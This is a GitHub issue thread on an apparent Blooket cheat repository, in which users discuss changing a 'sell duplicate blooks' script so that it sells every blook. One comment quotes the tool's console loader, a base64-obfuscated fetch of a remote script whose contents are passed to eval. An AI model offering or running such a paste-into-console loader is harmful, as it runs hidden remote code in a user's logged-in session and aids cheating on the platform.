### ISSUE TITLE
Can you make one where its sell all blooks

### ISSUE THREAD

**Issue by Bot4-Life** [glixzzy/blooket-hack#591]

**Comment by 3kh0** [comment]
**Hello there!**

Your issue is not complete and we can not tell the problem!<br>

Here are some questions you should answer when creating an issue:
- What browser do you use? 
- Are you on a school computer and/or connected to the school internet?
- Are you using a bookmarklet or are you pasting the code into the console?
- Has the code worked before?
- Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`

Thank you for letting us know the issue! 😀

**Comment by TheGamer1002** [comment]
Personally I do not see the purpose of this. You can already get 500 tokens/day, which works out to 20 boxes for the most expensive box. This should be enough.

**Comment by donaldli2020** [comment]
> Personally I do not see the purpose of this. You can already get 500 tokens/day, which works out to 20 boxes for the most expensive box. This should be enough.

i guess you can like empty your blooks if you wanna start over
but similar to sell dupe blooks

**Comment by Greenlio** [comment]
Sell all blooks..? I mean yeah, it's possible, but why?!

**Comment by donaldli2020** [comment]
> Sell all blooks..? I mean yeah, it's possible, but why?!

 can't find a reason

**Comment by coolawsome2009** [comment]
just do it yourself you blooket hater

**Comment by edward-not** [comment]
I'm not gonna submit a pull request for it but I can tell u guys how to do this.

Change this line:
`    const x = Object.entries(blooks).filter(i => i[1] > 1).map(i => [i[0], i[1] - 1]) `
to
`    const x = Object.entries(blooks).map(i => [i[0], i[1]]) `

in `sellDupeBlooks.js`


@Bot4-Life  You think you can do this locally without us needing to add the new code to the github ourselves (pull request)?

**Comment by edward-not** [comment]
How this works:

The original line gets the blooks that the account has and filters them to see which blooks have a quantity of more than 1 (`.filter(i => i[1] > 1)`). Then it basically just saves how many of this type of blook it needs to sell by doing **quantity-of-those-blooks** - 1 (`.map(i => [i[0], i[1] - 1])`). The new code I sent you has no filter and does not subtract 1 from the total number.

**Comment by edward-not** [comment]
[sellAllBlooks.txt](https://github.com/glixzzy/blooket-hack/files/7706090/sellAllBlooks.txt)


Here is the file if you need it. If this resolves your problem, please close the issue
